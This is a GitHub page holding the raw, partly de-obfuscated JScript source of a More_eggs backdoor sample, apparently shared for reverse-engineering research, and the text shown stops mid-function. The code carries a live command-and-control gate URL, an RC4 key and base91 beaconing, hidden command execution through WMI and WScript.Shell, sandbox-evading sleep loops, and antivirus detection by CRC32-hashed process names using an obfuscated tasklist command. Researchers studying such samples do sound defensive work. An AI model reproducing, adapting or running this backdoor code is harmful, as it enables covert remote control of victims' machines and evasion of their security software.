Skip to content
Permalink
Malware-Misc-RE/2020-07-25-more-eggs-vk.raw.js
Newer
Older
Raw Normal view History
100644 2306 lines (2256 sloc) 70.5 KB
@k-vitali
Create 2020-07-25-more-eggs-vk.rawjs
Jul 24, 2020
1
///////////////////////////////////////////////////////////////////////////////////////
2
////////////////////////// more_eggs sample ///////////////////////////////////////////
3
///////////////////////////////////////////////////////////////////////////////////////
4
5
///////////////////////////////////////////////////////////////////////////////////////
6
/////// source: https://twitter.com/VK_Intel/status/1286747453849468929 ///////////////
7
///////////////////////////////////////////////////////////////////////////////////////
8
9
function anonymous() {
10
var BV = "6.6a";
11
var Gate = "https://maps.doaglas.com/update/check";
12
var hit_each = 10;
13
var error_retry = 2;
14
var restart_h = 4;
15
var rcon_max = hit_each * (restart_h * 60) / (hit_each * hit_each);
16
var Rkey = "whVbBSXoQHLa9sfFVZ";
17
var rcon_now = 0;
18
var gtfo = false;
19
var selfdel = false;
20
var table = [];
21
var Build = "";
22
var PCN = "";
23
var UNM = "";
24
var SYSTEM = 0;
25
var rootK = "HKCU";
26
var workingDir = "";
27
var main_mitm = "";
28
var xApp = "";
29
var xTmp = "";
30
var PreserveH = "";
31
var xStore = "";
32
var set = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!#$%&()*+,./:;<=>?@[]^_`{|}~"';
33
var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
34
35
function obj(xString) {
36
return new ActiveXObject(xString);
37
}
38
var con;
39
try {
40
con = obj("Msxml2.XMLHTTP.6.0");
41
} catch (e) {
42
try {
43
con = obj("Msxml2.XMLHTTP.3.0");
44
} catch (e2) {
45
con = obj("Microsoft.XMLHTTP");
46
}
47
}
48
var xhr;
49
try {
50
xhr = obj("Msxml2.ServerXMLHTTP.6.0");
51
} catch (e3) {
52
xhr = obj("Msxml2.ServerXMLHTTP.3.0");
53
}
54
55
function check_Net(method) {
56
var Resp = false;
57
var conz1;
58
var t11 = "";
59
if (method === 1) {
60
conz1 = xhr;
61
} else {
62
conz1 = con;
63
}
64
try {
65
conz1.open("GET", "http://www.w3.org/1999/XSL/Format", false);
66
} catch (e1) {
67
if (method === 0) {
68
return check_Net(1);
69
} else {
70
return false;
71
}
72
}
73
conz1.onreadystatechange = function() {
74
if (conz1.readyState === 4) {
75
if (conz1.status === 200) {
76
t11 = conz1.responseText;
77
if (t11) {
78
if (t11 == 'This is another XSL namespace\n') {
79
Resp = true;
80
} else {
81
Resp = false;
82
}
83
} else {
84
Resp = false;
85
}
86
} else {
87
Resp = false;
88
}
89
}
90
};
91
try {
92
conz1.send();
93
} catch (e2) {
94
if (method === 0) {
95
return check_Net(1);
96
} else {
97
return false;
98
}
99
}
100
return Resp;
101
}
102
103
function cLength(mstr, min, max) {
104
var n = mstr.length;
105
if (n === 0) {
106
return false;
107
}
108
if (n >= min && (n <= max)) {
109
return true;
110
}
111
}
112
113
function rInt(min, max) {
114
min = Math.ceil(min);
115
max = Math.floor(max);
116
return Math.floor(Math.random() * (max - min + 1)) + min;
117
}
118
119
function rStr(len) {
120
var xRnd = "";
121
var i;
122
var randomPoz;
123
var charSet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
124
var clen = 62;
125
i = 0;
126
do {
127
randomPoz = Math.floor(Math.random() * clen);
128
xRnd += charSet.substring(randomPoz, randomPoz + 1);
129
i += 1;
130
} while (i < len);
131
return xRnd;
132
}
133
134
function fuck_js() {
135
var xNow = rInt(2, 16);
136
var rNow = rStr(xNow);
137
try {
138
xhr.setTimeouts(5000, 5000, 10000, 10000);
139
xhr.open("GET", "http://8.8.8.8/" + rNow, false);
140
xhr.send();
141
} catch (e9) {
142
return false;
143
}
144
}
145
146
function fexist(xpath) {
147
var fso;
148
try {
149
fso = obj("Scripting.FileSystemObject");
150
if (fso.FileExists(xpath)) {
151
return true;
152
} else {
153
return false;
154
}
155
} catch (feer) {
156
return false;
157
}
158
}
159
160
function rexist(xpath) {
161
var sh;
162
var rdata;
163
try {
164
sh = obj("Wscript.shell");
165
rdata = sh.RegRead(xpath);
166
if (rdata !== null) {
167
return true;
168
}
169
} catch (e71) {
170
return false;
171
}
172
}
173
174
function myEnv(xVar, xSystem) {
175
var a1;
176
var rEnv;
177
a1 = obj("WScript.Shell");
178
if (xSystem === 1) {
179
rEnv = a1.environment("SYSTEM");
180
} else {
181
rEnv = a1.environment("PROCESS");
182
}
183
return rEnv(xVar);
184
}
185
186
function myBits() {
187
var xBits;
188
xBits = myEnv("PROCESSOR_ARCHITECTURE", 1);
189
if (xBits === "AMD64") {
190
return "64";
191
} else {
192
return "86";
193
}
194
}
195
196
function zzzz4(key, str) {
197
var s = [];
198
var j = 0;
199
var x;
200
var res = "";
201
var i;
202
var y;
203
if (key && str) {
204
i = 0;
205
do {
206
s[i] = i;
207
i += 1;
208
} while (i < 256);
209
i = 0;
210
do {
211
j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;
212
x = s[i];
213
s[i] = s[j];
214
s[j] = x;
215
i += 1;
216
} while (i < 256);
217
i = 0;
218
j = 0;
219
y = 0;
220
do {
221
i = (i + 1) % 256;
222
j = (j + s[i]) % 256;
223
x = s[i];
224
s[i] = s[j];
225
s[j] = x;
226
res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);
227
y += 1;
228
} while (y < str.length);
229
}
230
return res;
231
}
232
233
function zzz4Bytes(xArray, key) {
234
var s = [];
235
var j = 0;
236
var x;
237
var outBytes = [];
238
var i;
239
var y;
240
if (key && xArray) {
241
i = 0;
242
do {
243
s[i] = i;
244
i += 1;
245
} while (i < 256);
246
i = 0;
247
do {
248
j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;
249
x = s[i];
250
s[i] = s[j];
251
s[j] = x;
252
i += 1;
253
} while (i < 256);
254
i = 0;
255
j = 0;
256
y = 0;
257
do {
258
i = (i + 1) % 256;
259
j = (j + s[i]) % 256;
260
x = s[i];
261
s[i] = s[j];
262
s[j] = x;
263
outBytes.push(xArray[y] ^ s[(s[i] + s[j]) % 256]);
264
y += 1;
265
} while (y < xArray.length);
266
}
267
return outBytes;
268
}
269
270
function tB(htc) {
271
var y = [];
272
y[0xC7] = 0x80;
273
y[0xFC] = 0x81;
274
y[0xE9] = 0x82;
275
y[0xE2] = 0x83;
276
y[0xE4] = 0x84;
277
y[0xE0] = 0x85;
278
y[0xE5] = 0x86;
279
y[0xE7] = 0x87;
280
y[0xEA] = 0x88;
281
y[0xEB] = 0x89;
282
y[0xE8] = 0x8A;
283
y[0xEF] = 0x8B;
284
y[0xEE] = 0x8C;
285
y[0xEC] = 0x8D;
286
y[0xC4] = 0x8E;
287
y[0xC5] = 0x8F;
288
y[0xC9] = 0x90;
289
y[0xE6] = 0x91;
290
y[0xC6] = 0x92;
291
y[0xF4] = 0x93;
292
y[0xF6] = 0x94;
293
y[0xF2] = 0x95;
294
y[0xFB] = 0x96;
295
y[0xF9] = 0x97;
296
y[0xFF] = 0x98;
297
y[0xD6] = 0x99;
298
y[0xDC] = 0x9A;
299
y[0xA2] = 0x9B;
300
y[0xA3] = 0x9C;
301
y[0xA5] = 0x9D;
302
y[0x20A7] = 0x9E;
303
y[0x192] = 0x9F;
304
y[0xE1] = 0xA0;
305
y[0xED] = 0xA1;
306
y[0xF3] = 0xA2;
307
y[0xFA] = 0xA3;
308
y[0xF1] = 0xA4;
309
y[0xD1] = 0xA5;
310
y[0xAA] = 0xA6;
311
y[0xBA] = 0xA7;
312
y[0xBF] = 0xA8;
313
y[0x2310] = 0xA9;
314
y[0xAC] = 0xAA;
315
y[0xBD] = 0xAB;
316
y[0xBC] = 0xAC;
317
y[0xA1] = 0xAD;
318
y[0xAB] = 0xAE;
319
y[0xBB] = 0xAF;
320
y[0x2591] = 0xB0;
321
y[0x2592] = 0xB1;
322
y[0x2593] = 0xB2;
323
y[0x2502] = 0xB3;
324
y[0x2524] = 0xB4;
325
y[0x2561] = 0xB5;
326
y[0x2562] = 0xB6;
327
y[0x2556] = 0xB7;
328
y[0x2555] = 0xB8;
329
y[0x2563] = 0xB9;
330
y[0x2551] = 0xBA;
331
y[0x2557] = 0xBB;
332
y[0x255D] = 0xBC;
333
y[0x255C] = 0xBD;
334
y[0x255B] = 0xBE;
335
y[0x2510] = 0xBF;
336
y[0x2514] = 0xC0;
337
y[0x2534] = 0xC1;
338
y[0x252C] = 0xC2;
339
y[0x251C] = 0xC3;
340
y[0x2500] = 0xC4;
341
y[0x253C] = 0xC5;
342
y[0x255E] = 0xC6;
343
y[0x255F] = 0xC7;
344
y[0x255A] = 0xC8;
345
y[0x2554] = 0xC9;
346
y[0x2569] = 0xCA;
347
y[0x2566] = 0xCB;
348
y[0x2560] = 0xCC;
349
y[0x2550] = 0xCD;
350
y[0x256C] = 0xCE;
351
y[0x2567] = 0xCF;
352
y[0x2568] = 0xD0;
353
y[0x2564] = 0xD1;
354
y[0x2565] = 0xD2;
355
y[0x2559] = 0xD3;
356
y[0x2558] = 0xD4;
357
y[0x2552] = 0xD5;
358
y[0x2553] = 0xD6;
359
y[0x256B] = 0xD7;
360
y[0x256A] = 0xD8;
361
y[0x2518] = 0xD9;
362
y[0x250C] = 0xDA;
363
y[0x2588] = 0xDB;
364
y[0x2584] = 0xDC;
365
y[0x258C] = 0xDD;
366
y[0x2590] = 0xDE;
367
y[0x2580] = 0xDF;
368
y[0x3B1] = 0xE0;
369
y[0xDF] = 0xE1;
370
y[0x393] = 0xE2;
371
y[0x3C0] = 0xE3;
372
y[0x3A3] = 0xE4;
373
y[0x3C3] = 0xE5;
374
y[0xB5] = 0xE6;
375
y[0x3C4] = 0xE7;
376
y[0x3A6] = 0xE8;
377
y[0x398] = 0xE9;
378
y[0x3A9] = 0xEA;
379
y[0x3B4] = 0xEB;
380
y[0x221E] = 0xEC;
381
y[0x3C6] = 0xED;
382
y[0x3B5] = 0xEE;
383
y[0x2229] = 0xEF;
384
y[0x2261] = 0xF0;
385
y[0xB1] = 0xF1;
386
y[0x2265] = 0xF2;
387
y[0x2264] = 0xF3;
388
y[0x2320] = 0xF4;
389
y[0x2321] = 0xF5;
390
y[0xF7] = 0xF6;
391
y[0x2248] = 0xF7;
392
y[0xB0] = 0xF8;
393
y[0x2219] = 0xF9;
394
y[0xB7] = 0xFA;
395
y[0x221A] = 0xFB;
396
y[0x207F] = 0xFC;
397
y[0xB2] = 0xFD;
398
y[0x25A0] = 0xFE;
399
y[0xA0] = 0xFF;
400
var ami = [];
401
var mi;
402
var renderer;
403
var atends;
404
mi = 0;
405
do {
406
renderer = htc.charCodeAt(mi);
407
if (renderer < 128) {
408
atends = renderer;
409
} else {
410
atends = y[renderer];
411
}
412
ami.push(atends);
413
mi += 1;
414
} while (mi < htc.length);
415
return ami;
416
}
417
418
function tS(arenderer) {
419
var x = [];
420
x[0x80] = 0x00C7;
421
x[0x81] = 0x00FC;
422
x[0x82] = 0x00E9;
423
x[0x83] = 0x00E2;
424
x[0x84] = 0x00E4;
425
x[0x85] = 0x00E0;
426
x[0x86] = 0x00E5;
427
x[0x87] = 0x00E7;
428
x[0x88] = 0x00EA;
429
x[0x89] = 0x00EB;
430
x[0x8A] = 0x00E8;
431
x[0x8B] = 0x00EF;
432
x[0x8C] = 0x00EE;
433
x[0x8D] = 0x00EC;
434
x[0x8E] = 0x00C4;
435
x[0x8F] = 0x00C5;
436
x[0x90] = 0x00C9;
437
x[0x91] = 0x00E6;
438
x[0x92] = 0x00C6;
439
x[0x93] = 0x00F4;
440
x[0x94] = 0x00F6;
441
x[0x95] = 0x00F2;
442
x[0x96] = 0x00FB;
443
x[0x97] = 0x00F9;
444
x[0x98] = 0x00FF;
445
x[0x99] = 0x00D6;
446
x[0x9A] = 0x00DC;
447
x[0x9B] = 0x00A2;
448
x[0x9C] = 0x00A3;
449
x[0x9D] = 0x00A5;
450
x[0x9E] = 0x20A7;
451
x[0x9F] = 0x0192;
452
x[0xA0] = 0x00E1;
453
x[0xA1] = 0x00ED;
454
x[0xA2] = 0x00F3;
455
x[0xA3] = 0x00FA;
456
x[0xA4] = 0x00F1;
457
x[0xA5] = 0x00D1;
458
x[0xA6] = 0x00AA;
459
x[0xA7] = 0x00BA;
460
x[0xA8] = 0x00BF;
461
x[0xA9] = 0x2310;
462
x[0xAA] = 0x00AC;
463
x[0xAB] = 0x00BD;
464
x[0xAC] = 0x00BC;
465
x[0xAD] = 0x00A1;
466
x[0xAE] = 0x00AB;
467
x[0xAF] = 0x00BB;
468
x[0xB0] = 0x2591;
469
x[0xB1] = 0x2592;
470
x[0xB2] = 0x2593;
471
x[0xB3] = 0x2502;
472
x[0xB4] = 0x2524;
473
x[0xB5] = 0x2561;
474
x[0xB6] = 0x2562;
475
x[0xB7] = 0x2556;
476
x[0xB8] = 0x2555;
477
x[0xB9] = 0x2563;
478
x[0xBA] = 0x2551;
479
x[0xBB] = 0x2557;
480
x[0xBC] = 0x255D;
481
x[0xBD] = 0x255C;
482
x[0xBE] = 0x255B;
483
x[0xBF] = 0x2510;
484
x[0xC0] = 0x2514;
485
x[0xC1] = 0x2534;
486
x[0xC2] = 0x252C;
487
x[0xC3] = 0x251C;
488
x[0xC4] = 0x2500;
489
x[0xC5] = 0x253C;
490
x[0xC6] = 0x255E;
491
x[0xC7] = 0x255F;
492
x[0xC8] = 0x255A;
493
x[0xC9] = 0x2554;
494
x[0xCA] = 0x2569;
495
x[0xCB] = 0x2566;
496
x[0xCC] = 0x2560;
497
x[0xCD] = 0x2550;
498
x[0xCE] = 0x256C;
499
x[0xCF] = 0x2567;
500
x[0xD0] = 0x2568;
501
x[0xD1] = 0x2564;
502
x[0xD2] = 0x2565;
503
x[0xD3] = 0x2559;
504
x[0xD4] = 0x2558;
505
x[0xD5] = 0x2552;
506
x[0xD6] = 0x2553;
507
x[0xD7] = 0x256B;
508
x[0xD8] = 0x256A;
509
x[0xD9] = 0x2518;
510
x[0xDA] = 0x250C;
511
x[0xDB] = 0x2588;
512
x[0xDC] = 0x2584;
513
x[0xDD] = 0x258C;
514
x[0xDE] = 0x2590;
515
x[0xDF] = 0x2580;
516
x[0xE0] = 0x03B1;
517
x[0xE1] = 0x00DF;
518
x[0xE2] = 0x0393;
519
x[0xE3] = 0x03C0;
520
x[0xE4] = 0x03A3;
521
x[0xE5] = 0x03C3;
522
x[0xE6] = 0x00B5;
523
x[0xE7] = 0x03C4;
524
x[0xE8] = 0x03A6;
525
x[0xE9] = 0x0398;
526
x[0xEA] = 0x03A9;
527
x[0xEB] = 0x03B4;
528
x[0xEC] = 0x221E;
529
x[0xED] = 0x03C6;
530
x[0xEE] = 0x03B5;
531
x[0xEF] = 0x2229;
532
x[0xF0] = 0x2261;
533
x[0xF1] = 0x00B1;
534
x[0xF2] = 0x2265;
535
x[0xF3] = 0x2264;
536
x[0xF4] = 0x2320;
537
x[0xF5] = 0x2321;
538
x[0xF6] = 0x00F7;
539
x[0xF7] = 0x2248;
540
x[0xF8] = 0x00B0;
541
x[0xF9] = 0x2219;
542
x[0xFA] = 0x00B7;
543
x[0xFB] = 0x221A;
544
x[0xFC] = 0x207F;
545
x[0xFD] = 0x00B2;
546
x[0xFE] = 0x25A0;
547
x[0xFF] = 0x00A0;
548
var bb = [];
549
var leppek = "";
550
var atends;
551
var renderer;
552
var mi;
553
mi = 0;
554
do {
555
atends = arenderer[mi];
556
if (atends < 128) {
557
renderer = atends;
558
} else {
559
renderer = x[atends];
560
}
561
bb.push(String.fromCharCode(renderer));
562
mi += 1;
563
} while (mi < arenderer.length);
564
leppek = bb.join("");
565
return leppek;
566
}
567
568
function mZcheck(arenderer) {
569
if (arenderer[0] === 0x4D && arenderer[1] === 0x5a) {
570
return true;
571
} else {
572
return false;
573
}
574
}
575
576
function tempExtra() {
577
return Math.floor(Math.random() * 65536);
578
}
579
580
function randomTmp() {
581
var fso2;
582
var t1;
583
var xelse = "22222222.txt";
584
try {
585
fso2 = obj("Scripting.FileSystemObject");
586
t1 = fso2.GetTempName();
587
if (t1) {
588
return t1;
589
} else {
590
return xelse;
591
}
592
} catch (e0) {
593
return xelse;
594
}
595
}
596
597
function tempNow() {
598
var xout = tempExtra();
599
if (!xout) {
600
xout = randomTmp();
601
} else {
602
xout += ".txt";
603
}
604
return xout;
605
}
606
607
function dFile(filespec) {
608
var fso;
609
try {
610
fso = obj("Scripting.FileSystemObject");
611
if (fso.FileExists(filespec)) {
612
fso.DeleteFile(filespec);
613
}
614
} catch (e8) {
615
return false;
616
}
617
}
618
619
function sFolder(CSIDL) {
620
var objFolder;
621
try {
622
var app = obj("Shell.Application");
623
objFolder = app.NameSpace(CSIDL);
624
if (objFolder !== null) {
625
var objFolderItem;
626
objFolderItem = objFolder.Self;
627
if (objFolderItem !== null) {
628
return objFolderItem.Path;
629
} else {
630
return false;
631
}
632
} else {
633
return false;
634
}
635
} catch (e1z0) {
636
return false;
637
}
638
}
639
640
function base91_encode(data) {
641
if (data) {
642
var len = data.length;
643
var ret = "";
644
var n = 0;
645
var b = 0;
646
var v = 0;
647
var i = 0;
648
do {
649
b = b | data.charCodeAt(i) << n;
650
n = n + 8;
651
if (n > 13) {
652
v = b & 8191;
653
if (v > 88) {
654
b = b >> 13;
655
n = n - 13;
656
} else {
657
v = b & 16383;
658
b = b >> 14;
659
n = n - 14;
660
}
661
ret += set.charAt(v % 91) + set.charAt(v / 91 | 0);
662
}
663
i = i + 1;
664
} while (i < len);
665
if (n) {
666
ret += set.charAt(b % 91);
667
if (n > 7 || b > 90) {
668
ret += set.charAt(b / 91 | 0);
669
}
670
}
671
return ret;
672
}
673
}
674
675
function base91_decode(data) {
676
if (data) {
677
var len = data.length;
678
var ret = "";
679
var b = 0;
680
var n = 0;
681
var v = -1;
682
var p;
683
var i = 0;
684
do {
685
p = set.indexOf(data.charAt(i));
686
if (p !== -1) {
687
if (v < 0) {
688
v = p;
689
} else {
690
v = v + p * 91;
691
b = b | v << n;
692
if ((v & 8191) > 88) {
693
n = n + 13;
694
} else {
695
n = n + 14;
696
}
697
do {
698
ret += String.fromCharCode(b & 0xff);
699
b = b >> 8;
700
n = n - 8;
701
} while (n > 7);
702
v = -1;
703
}
704
}
705
i = i + 1;
706
} while (i < len);
707
if (v > -1) {
708
ret += String.fromCharCode((b | v << n) & 0xff);
709
}
710
return (ret);
711
}
712
}
713
714
function base64_encode(data) {
715
if (data) {
716
var result = '';
717
var i = 0;
718
var b1;
719
var b2;
720
var b3;
721
var b4;
722
var n = data.length;
723
var a;
724
var b;
725
var c;
726
do {
727
a = data.charCodeAt(i++);
728
b = data.charCodeAt(i++);
729
c = data.charCodeAt(i++);
730
a = a ? a : 0;
731
b = b ? b : 0;
732
c = c ? c : 0;
733
b1 = (a >> 2) & 0x3F;
734
b2 = ((a & 0x3) << 4) | ((b >> 4) & 0xF);
735
b3 = ((b & 0xF) << 2) | ((c >> 6) & 0x3);
736
b4 = c & 0x3F;
737
if (!b) {
738
b3 = 64;
739
b4 = 64;
740
} else if (!c) {
741
b4 = 64;
742
}
743
result = result + b64.charAt(b1) + b64.charAt(b2) + b64.charAt(b3) + b64.charAt(b4);
744
b1 = 0;
745
b2 = 0;
746
b3 = 0;
747
b4 = 0;
748
a = 0;
749
b = 0;
750
c = 0;
751
} while (i < n);
752
return result;
753
}
754
}
755
756
function cmd_command(sCom, wait1) {
757
var oShell;
758
var w11;
759
try {
760
oShell = obj("Wscript.Shell");
761
if (wait1 == 1) {
762
w11 = 1;
763
} else {
764
w11 = 0;
765
}
766
if (!w11) {
767
w11 = 0;
768
}
769
oShell.Run(sCom, 0, w11);
770
return true;
771
} catch (ec1) {
772
return false;
773
}
774
}
775
776
function wmi_command(sCom, wait) {
777
try {
778
var loc = obj("WbemScripting.SWbemLocator");
779
var svc = loc.ConnectServer(".", "root\\cimv2");
780
var objStartup = svc.Get("Win32_ProcessStartup").SpawnInstance_();
781
objStartup.ShowWindow = 0;
782
var objProcess = svc.Get("Win32_Process");
783
var objInParam = objProcess.Methods_("Create").inParameters.SpawnInstance_();
784
objInParam.Properties_.Item("CommandLine").Value = sCom;
785
objInParam.Properties_.Item("ProcessStartupInformation").Value = objStartup;
786
var objOutParams = svc.ExecMethod("Win32_Process", "Create", objInParam);
787
if (objOutParams.ReturnValue !== 0) {
788
return cmd_command(sCom, wait);
789
}
790
if (wait == 1) {
791
var cPid = objOutParams.ProcessId;
792
var eventObj;
793
var eventSrc = svc.ExecNotificationQuery("SELECT * FROM __InstanceDeletionEvent Within 1 Where TargetInstance ISA 'Win32_Process'");
794
while (true) {
795
eventObj = eventSrc.nextEvent();
796
if (eventObj.TargetInstance.ProcessID == cPid) {
797
break;
798
}
799
}
800
}
801
return true;
802
} catch (ec1) {
803
return cmd_command(sCom, wait);
804
}
805
}
806
807
function waitfor(sMinutes) {
808
var limit = Date.parse(Date()) + (sMinutes * 60000);
809
while (Date.parse(Date()) < limit) {
810
fuck_js();
811
}
812
main();
813
}
814
815
function wmi_waitfor(sMinutes) {
816
var ret88;
817
if (!sMinutes) {
818
return false;
819
}
820
var seconds = sMinutes * 60;
821
var sec2 = seconds.toString();
822
try {
823
ret88 = wmi_command('typeperf.exe "\\System\\Processor Queue Length" -si ' + sec2 + ' -sc 1', 1);
824
if (ret88 == true) {
825
main();
826
} else {
827
waitfor(sMinutes);
828
}
829
} catch (ewmi) {
830
return waitfor(sMinutes);
831
}
832
}
833
834
function waitfor2(sMinutes, iGo) {
835
var xlmt;
836
xlmt = Date.parse(Date()) + (sMinutes * 60000);
837
while (Date.parse(Date()) < xlmt) {
838
fuck_js();
839
}
840
if (iGo === 1) {
841
go();
842
}
843
}
844
845
function wmi_waitfor2(sMinutes, iGo) {
846
var ret88;
847
if (!sMinutes) {
848
return false;
849
}
850
var seconds = sMinutes * 60;
851
var sec2 = seconds.toString();
852
try {
853
ret88 = wmi_command('typeperf.exe "\\System\\Processor Queue Length" -si ' + sec2 + ' -sc 1', 1);
854
if (ret88 == true) {
855
if (iGo === 1) {
856
go();
857
}
858
} else {
859
waitfor2(sMinutes, iGo);
860
}
861
} catch (ewmi) {
862
return waitfor2(sMinutes, iGo);
863
}
864
}
865
866
function remove_non_ascii(str) {
867
var ret1 = "";
868
if ((!str) || (str === '')) {
869
return "0";
870
} else {
871
try {
872
str = str.toString();
873
ret1 = str.replace(/[^\x20-\x7E]/g, '');
874
} catch (un1) {
875
return "0";
876
}
877
}
878
if (!ret1) {
879
return "0";
880
} else {
881
return ret1;
882
}
883
}
884
885
function check_Host(method) {
886
var Resp = false;
887
var Temp90 = "";
888
var g11 = 0;
889
var conz1;
890
if (SYSTEM === 1) {
891
conz1 = xhr;
892
} else {
893
if (method === 1) {
894
conz1 = xhr;
895
} else {
896
conz1 = con;
897
}
898
}
899
try {
900
conz1.open("POST", Gate, false);
901
} catch (e3) {
902
if (SYSTEM === 0 && method === 0) {
903
return check_Host(1);
904
} else {
905
return false;
906
}
907
}
908
conz1.onreadystatechange = function() {
909
if (conz1.readyState === 4) {
910
if (conz1.status === 200) {
911
Temp90 = conz1.responseText;
912
if (Temp90) {
913
if (cLength(Temp90, 8, 32) === true) {
914
Resp = true;
915
}
916
}
917
}
918
}
919
};
920
var keynow = rStr(2);
921
var rNow = rInt(8, 32);
922
var not_unique = "|" + rStr(rNow) + "|";
923
var xCrypted = zzzz4(Rkey + keynow, not_unique) + keynow;
924
var encoded = base91_encode(xCrypted);
925
if (SYSTEM === 1 || method === 1) {
926
try {
927
conz1.setOption(2, 13056);
928
} catch (e411) {
929
g11 = 1;
930
}
931
}
932
try {
933
conz1.send(encoded);
934
} catch (e4) {
935
if (SYSTEM === 0 && method === 0) {
936
return check_Host(1);
937
} else {
938
return false;
939
}
940
}
941
return Resp;
942
}
943
944
function crc32_init() {
945
var i = 0;
946
var tmp = 0;
947
var k = 0;
948
while (i < 256) {
949
tmp = i;
950
k = 0;
951
while (k < 8) {
952
tmp = tmp & 1 ? 3988292384 ^ tmp >>> 1 : tmp >>> 1;
953
k += 1;
954
}
955
table[i] = tmp;
956
i += 1;
957
}
958
}
959
960
function b_crc32(str) {
961
var crc = -1;
962
var iTop = str.length;
963
var i = 0;
964
while (i < iTop) {
965
crc = (crc >>> 8) ^ table[(crc ^ str.charCodeAt(i)) & 0xFF];
966
i += 1;
967
}
968
return (crc ^ (-1)) >>> 0;
969
}
970
971
function cAV() {
972
var pList = [];
973
var i = 0;
974
var rAV = "";
975
var ExeNow = "";
976
var fso;
977
var file4;
978
var vStr = "";
979
var tList = [];
980
var tL2 = [];
981
var rExe = "";
982
var x;
983
var pNow = "";
984
var cNow = 0;
985
var rFile = "";
986
var wInternal;
987
var itemNow;
988
var v1 = "a";
989
var v2 = "b";
990
var v3 = "c";
991
var v4 = "d";
992
var v5 = "e";
993
var v6 = "f";
994
var v7 = "g";
995
var v8 = "h";
996
var v9 = "i";
997
var v10 = "j";
998
var v11 = "k";
999
var v12 = "l";
1000
var v13 = "m";
1001
var v14 = "n";
1002
var v15 = "o";
1003
var v16 = "p";
1004
var v17 = "q";
1005
var v18 = "r";
1006
var v19 = "s";
1007
var v20 = "t";
1008
var v21 = "u";
1009
var v22 = "v";
1010
var v23 = "w";
1011
var v24 = "x";
1012
var v25 = "y";
1013
var v26 = "z";
1014
var v27 = "1";
1015
var v28 = "2";
1016
var v29 = "3";
1017
var v30 = "4";
1018
var v31 = "5";
1019
var ret7;
1020
try {
1021
var loc = obj("WbemScripting.SWbemLocator");
1022
var svc = loc.ConnectServer(".", "root\\cimv2");
1023
var coll = svc.ExecQuery("SELECT * FROM Win32_Process");
1024
var items = new Enumerator(coll);
1025
while (items.atEnd() === false) {
1026
itemNow = items.item();
1027
if (itemNow) {
1028
ExeNow = itemNow.Name;
1029
tList.push(ExeNow);
1030
}
1031
items.moveNext();
1032
}
1033
ExeNow = "";
1034
wInternal = 1;
1035
} catch (ave1) {
1036
rFile = xTmp + tempNow();
1037
var r1 = rStr(rInt(4, 8));
1038
ret7 = wmi_command('cmd /v /c set "' + r1 + '=s" && ta!' + r1 + '!kli!' + r1 + '!t /NH /FO C!' + r1 + '!V > "' + rFile + '"', 1);
1039
if (ret7 == false) {
1040
dFile(rFile);
1041
return "0";
1042
}
1043
wInternal = 0;
1044
}
1045
if (wInternal == 0) {
1046
try {
1047
if (fexist(rFile) === true) {
1048
fso = obj("Scripting.FileSystemObject");
1049
file4 = fso.OpenTextFile(rFile, 1, 0);
1050
if (file4.AtEndOfStream === false) {
1051
vStr = file4.ReadAll();
1052
}
1053
file4.Close();
1054
dFile(rFile);
1055
} else {
1056
return "0";
1057
}
1058
} catch (eav1) {
1059
return "0";
1060
}
1061
try {
1062
if (vStr) {
1063
tList = vStr.split(/\r?\n/);
1064
} else {
1065
return "0";
1066
}
1067
} catch (eav3) {
1068
return "0";
1069
}
1070
}
1071
try {
1072
if (tList.length <= 5) {
1073
return "0";
1074
}
1075
crc32_init();
1076
i = 0;
1077
do {
1078
if (wInternal == 1) {
1079
rExe = tList[i];
1080
} else {
1081
ExeNow = tList[i];
1082
tL2 = ExeNow.split('"');
1083
rExe = tL2[1];
1084
}
1085
if ((rExe) && (rExe.length >= 4)) {
1086
cNow = b_crc32(rExe.toLowerCase());
1087
if (cNow && cNow !== 3377271179 && cNow !== 3106260013 && cNow !== 902868994 && cNow !== 74504709 && cNow !== 3187896405 && cNow !== 1036299297 && cNow !== 2619149582 && cNow !== 3034799888 && cNow !== 3286091477 && cNow !== 1025985939 && cNow !== 437725275 && cNow !== 3520973717 && cNow !== 81053313 && cNow !== 3027707000 && cNow !== 1251423904 && cNow !== 3867582538 && cNow !== 961692650 && cNow !== 1073290778 && cNow !== 3024872867 && cNow !== 1105170146 && cNow !== 333580186 && cNow !== 2027685132 && cNow !== 4097471352) {
1088
pList.push(cNow);
1089
}
1090
}
1091
rExe = "";
1092
i += 1;
1093
} while (i < tList.length);
1094
tList = [];
1095
tL2 = [];
1096
} catch (eav3) {
1097
return "0";
1098
}
1099
if (pList.length >= 5) {
1100
cNow = 0;
1101
x = 0;
1102
do {
1103
pNow = pList[x];
1104
switch (pNow) {
1105
case 4167611121:
1106
if (rAV.indexOf(v1) === -1) {
1107
rAV += v1 + ",";
1108
}
1109
break;
1110
case 877060326:
1111
if (rAV.indexOf(v1) === -1) {
1112
rAV += v1 + ",";
1113
}
1114
break;
1115
case 305523985:
1116
if (rAV.indexOf(v2) === -1) {
1117
rAV += v2 + ",";
1118
}
1119
break;
1120
case 800732934:
1121
if (rAV.indexOf(v2) === -1) {
1122
rAV += v2 + ",";
1123
}
1124
break;
1125
case 1964687411:
1126
if (rAV.indexOf(v2) === -1) {
1127
rAV += v2 + ",";
1128
}
1129
break;
1130
case 2528998123:
1131
if (rAV.indexOf(v2) === -1) {
1132
rAV += v2 + ",";
1133
}
1134
break;
1135
case 536747592:
1136
if (rAV.indexOf(v4) === -1) {
1137
rAV += v4 + ",";
1138
}
1139
break;
1140
case 184741780:
1141
if (rAV.indexOf(v4) === -1) {
1142
rAV += v4 + ",";
1143
}
1144
break;
1145
case 242152363:
1146
if (rAV.indexOf(v5) === -1) {
1147
rAV += v5 + ",";
1148
}
1149
break;
1150
case 3038770874:
1151
if (rAV.indexOf(v6) === -1) {
1152
rAV += v6 + ",";
1153
}
1154
break;
1155
case 1863628361:
1156
if (rAV.indexOf(v6) === -1) {
1157
rAV += v6 + ",";
1158
}
1159
break;
1160
case 1779566114:
1161
if (rAV.indexOf(v6) === -1) {
1162
rAV += v6 + ",";
1163
}
1164
break;
1165
case 19515369:
1166
if (rAV.indexOf(v7) === -1) {
1167
